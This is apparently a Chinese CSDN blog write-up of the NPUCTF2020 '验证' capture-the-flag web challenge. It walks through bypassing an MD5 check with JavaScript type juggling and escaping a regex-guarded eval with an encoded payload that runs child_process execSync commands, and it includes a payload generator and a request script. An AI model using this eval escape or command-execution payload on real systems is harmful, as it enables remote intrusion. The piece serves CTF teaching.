[NPUCTF2020]验证

最新推荐文章于 2024-05-07 23:11:20 发布
最新推荐文章于 2024-05-07 23:11:20 发布
阅读量1.2k 收藏 5
点赞数 23
文章标签: javascript 笔记 ctf web安全 题解
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75361164/article/details/137228835
版权

[NPUCTF2020]验证🐎

const express = require('express');
const bodyParser = require('body-parser');
const cookieSession = require('cookie-session');

const fs = require('fs');
const crypto = require('crypto');

const keys = require('./key.js').keys;

function md5(s) {
  return crypto.createHash('md5')
    .update(s)
    .digest('hex');
}

function saferEval(str) {
  if (str.replace(/(?:Math(?:\.\w+)?)|[()+\-*/&|^%<>=,?:]|(?:\d+\.?\d*(?:e\d+)?)| /g, '')) {
    return null;
  }
  return eval(str);
} // 2020.4/WORKER1 淦,上次的库太垃圾,我自己写了一个

const template = fs.readFileSync('./index.html').toString();
function render(results) {
  return template.replace('{{results}}', results.join('<br/>'));
}

const app = express();

app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

app.use(cookieSession({
  name: 'PHPSESSION', // 2020.3/WORKER2 嘿嘿,给👴爪⑧
  keys
}));

Object.freeze(Object);
Object.freeze(Math);

app.post('/', function (req, res) {
  let result = '';
  const results = req.session.results || [];
  const { e, first, second } = req.body;
  if (first && second && first.length === second.length && first!==second && md5(first+keys[0]) === md5(second+keys[0])) {
    if (req.body.e) {
      try {
        result = saferEval(req.body.e) || 'Wrong Wrong Wrong!!!';
      } catch (e) {
        console.log(e);
        result = 'Wrong Wrong Wrong!!!';
      }
      results.unshift(`${req.body.e}=${result}`);
    }
  } else {
    results.unshift('Not verified!');
  }
  if (results.length > 13) {
    results.pop();
  }
  req.session.results = results;
  res.send(render(req.session.results));
});

// 2019.10/WORKER1 老板娘说她要看到我们的源代码,用行数计算KPI
app.get('/source', function (req, res) {
  res.set('Content-Type', 'text/javascript;charset=utf-8');
  res.send(fs.readFileSync('./index.js'));
});

app.get('/', function (req, res) {
  res.set('Content-Type', 'text/html;charset=utf-8');
  req.session.admin = req.session.admin || 0;
  res.send(render(req.session.results = req.session.results || []))
});

app.listen(80, '0.0.0.0', () => {
  console.log('Start listening')
});
  • 解题分两步,首先js弱类型绕过,然后绕过saferEval函数的正则表达式

js弱类型绕过

[[Nodejs#弱类型]]

  • 和php类似
    image.png
  • nodejs的字符串无论和其他什么基础类型相加都是字符类型
    image.png
  • 数字类型没有length属性,字典也没有
    image.png

来看源码

if (first && second && first.length === second.length && first!==second && md5(first+keys[0]) === md5(second+keys[0]))
  • 首先要first和second的length属性相同,那就不能用数字和字典了,使用字符串或者数组
  • 然后因为keys[0]我们不知道,但是他基本上是String类型,根据上面的String类型加别的类型规则,我们只需让first=[1],second=‘1’,就可以让first+keys[0] === second+keys[0],从而绕过md5
    不能用text格式了,需要用json传,保证一个是数组一个是字符串。
    image.png

绕过正则表达式

  • 首先来看看源码
if (str.replace(/(?:Math(?:\.\w+)?)|[()+\-*/&|^%<>=,?:]|(?:\d+\.?\d*(?:e\d+)?)| /g, ''))
  • (?:Math(?:\.\w+)?):匹配 Math.[0-9a-z]
  • [()+\-*/&|^%<>=,?:]:匹配中括号内任意一个字符(\-为减号)
  • (?:\d+\.?\d*(?:e\d+)?):匹配 数字开头 一个或零个点 一个或零个 e[0-9]
  • :匹配空格

箭头函数

=>是箭头函数(匿名函数)其类似其类似 (参数1, 参数2, …, 参数N) => { return 函数返回语句内容 } ,调用的话可以看下面的例子(如果参数为单个的话就不需要括号了)
image.png

  • 可以看到当为单个参数的时候可以不用括号
  • 当我们使用()代替{}就会牵扯到自调用

自调用:(()=>())()

可以使用()代替{}

  • 这时和{}的写法有所不同
  • 不需要return了
  • (参数1, 参数2, …, 参数N) => ( 语句1,语句2,语句3…… ) ,执行顺序从左到右,已最右边的语句结果作为返回值
    image.png
  • 它写单个参数的话也可以不用括号
    image.png

payload

  • 根据上面我们在来看这题需要使用箭头函数的自调用+toString绕过
  • 而且开头要使用Math
  • 由此得出payload
(Math=>(Math=Math.constructor,Math.constructor(Math.fromCharCode(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,83,121,110,99,40,39,99,97,116,32,47,102,108,97,103,39,41,46,116,111,83,116,114,105,110,103,40,41))()))(Math+1)

排一下版,更好理解

(Math=>
    (Math=Math.constructor,
            Math.constructor(
                Math.fromCharCode(114,101,116,117,114,110,32,112,114,111,
                    99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,
                    46,114,101,113,117,105,114,101,40,39,99,104,105,108,100,
                    95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,83,
                    121,110,99,40,39,99,97,116,32,47,102,108,97,103,39,41))()
    )
)(Math+1)

其中,String.fromCharCode的内容可以用脚本生成

def gen(cmd):  
s = f"return process.mainModule.require('child_process').execSync('{cmd}').toString()"  
return ','.join([str(ord(i)) for i in s])  
  
print('String.fromCharCode('+gen('ls')+')')

# String.fromCharCode(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,83,121,110,99,40,39,108,115,39,41,46,116,111,83,116,114,105,110,103,40,41)

image.png

  • 我是直接使用Postman的,也可以用脚本
    payload脚本
import requests
import json

headers = {
    "Content-Type": "application/json"
}
url = "http://18ba1e8e-c273-45f3-bd2b-a2b05a922885.node4.buuoj.cn:81/"
data = {"e": "2-1", "first": [0], "second": "0"}
r = requests.post(url, data=json.dumps(data), headers=headers)
print(r.text)
尘佑不尘
关注
  • 23
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[NPUCTF2020]Mersenne twister(mt73991伪随机)
weixin_44110537的博客
09-06 452
encrypt from hashlib import * from itertools import * from binascii import hexlify , unhexlify from flag import flag ,seed assert len(flag) == 26 assert flag[:7] == 'npuctf{' assert flag[-1] == '}' XOR = lambda s1 ,s2 : bytes([x1 ^ x2 for x1 ,x2 in zip(
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
[NPUCTF2020]验证
feng的博客
04-02 1338
知识点 JS弱类型 JS的toString特性 正则表达式绕过 JS箭头函数利用 JS原型链 不会node.js我太菜了,要慢慢学起来。 WP 进入环境访问/source路由看到源码: const express = require('express'); const bodyParser = require('body-parser'); const cookieSession = require('cookie-session'); const fs = require('fs'); const
BUUCTF [NPUCTF2020]芜湖
weixin_53349587的博客
01-09 2941
这道题是一个base64隐写,我们要先提取出所有的base加密值,然后用base隐写提取的函数,把flag提取出来,就得到了flag。 1.提取base值 本来想着用ida动调一下,应该可以提出来,结果值在堆上面,ida动调只能看到一半的base值,一点用也没有,没办法,就用pwn的pwndbg查看堆: 接下来就一直单步s运行下去,一个一个把base值提取出来,得到最终的base值: "55y85YmN6YeN5aSN55qE6aOO5pmvLG==", "5riQ5riQ5qih57OK5L
NPUCTF2020】EzRSA
MangoFengC++
05-26 441
EzRSA 题目 from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 flag = b'NPUCTF{
[NPUCTF2020]ezlogin
nigo134的博客
06-13 556
xPath注入这题服务端用户名和密码通过xml文件存储,通过将提交的用户名和密码拼接到xpath中进行查询,查询到数据即通过验证,反之则未通过。猜测后台xpath语法: 我们可以在$username处进行注入1.获取根下的节点个数 通过count(/)获取根下节点个数,当等于2时错误因此判断根下只有一个节点。2.获取根下节点名 string-length() :获取字符串长度substring() :截取字符串name() :获取节点名称3.重复1和2遍历出所有叶子
刷题记录-NPUCTF2020(web部分)
weixin_43610673的博客
05-03 4682
在buu刷了一遍,题目好顶,还剩一题EzShiro摸不出来 ReadlezPHP 禁用了右键查看源代码 view-source: 自行加上前缀即可 打开链接/time.php?source 很明显,php反序列化,通过echo b(b(b(a); 写入shell,system等被禁用,用assert(断言) <?php class HelloPhp { public $a; ...
[NPUCTF2020]ezlogin xPATH注入
qq_54929891的博客
07-01 412
xPATH
npuctf
zipry的博客
06-26 688
NPUCTF 复现 CTF WP 计算机网络 CTF 学习总结 密码学 操作系统 NPUCTF 复现 2个月前 / 0评 / 1赞 赏 码比赛的时候运维太差了,所以就想着赛后复现一下。Table of Contents[NPUCTF2020]ReadlezPHP[NPUCTF2020]ezlogin[NPUCTF2020]验证????[NPUCTF
buuctf-web-p6 [NPUCTF2020]web
qq_29060627的博客
11-18 366
flag就是 : flag{we6_4og_1s_e4syg0ing}
解读“模块的沟通”
08-04
我在写Verilog的时候,经常会用到一种方法(这一种方法是akuei2发明的)为了大家能看懂我的程序。
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 ...
vue3+arco design通过动态表单方式实现自定义筛选
最新发布
m0_72167535的博客
05-07 387
vue3+arco design通过动态表单方式实现自定义筛选
基于Springboot的家具网站
趙兴晨的博客
05-03 542
本文介绍了一款基于现代Web技术构建的家具网站,旨在通过互联网技术优化家具产品的展示与销售,提高用户的购物体验,同时为家具制造商和零售商提供一个高效的在线销售平台。本研究的主要目的是设计并实现一个高效、易用的家具网站,通过系统化的产品展示流程和智能化的购物功能,提升家具产品的在线销售效率和管理水平。本研究通过设计和实现家具网站,有效地解决了传统家具销售中的展示局限性和购物效率低下的问题,提高了家具产品的在线销售效率和用户的购物体验,并为相关领域的研究和实践提供了有益的参考。
基于Springboot的旅游管理系统(有报告)。Javaee项目,springboot项目。
XING的博客
05-03 1200
基于Springboot的旅游管理系统(有报告)。Javaee项目,springboot项目。数据库作为系统数据储存平台,实现了基于B/S结构的Web系统。界面简洁,操作简单。采用M(model)V(view)C(controller)三层体系结构,通过。
vue快速入门(五十)重定向
不起眼小菜菜的博客
05-03 429
注释很详细,直接上代码……
50个前端实战项目之04:隐藏的搜索小组件
前端开发博客
05-03 1097
大家好,我是宝哥。今天讲50个前端实战项目之04:隐藏的搜索小组件。源码下载地址https://github.com/bradtraversy/50projects50days/tree/master/hidden-search前端实战项目系列正在更新:04/5001:可展开卡片02:进度条03:旋转导航动画04:隐藏的搜索小组件项目介绍本项目演示了一个简洁实用的隐藏式搜索小部件。点击搜索按钮后,...
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值